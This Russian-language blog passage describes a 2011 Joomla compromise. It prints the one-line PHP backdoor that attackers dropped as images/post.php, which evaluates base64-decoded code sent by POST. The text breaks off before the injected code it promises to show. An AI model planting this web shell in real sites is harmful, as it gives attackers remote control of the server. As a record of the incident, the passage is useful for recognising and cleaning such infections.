В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор - файл post.php, следующего содержания
<?php eval(base64_decode($_POST["php"])); ?>
После чего основная масса файлов с расширением php (причем, заражалось все без разбору, включая configuration.php.
Код, который помещался в файл таков:
Последние комментарии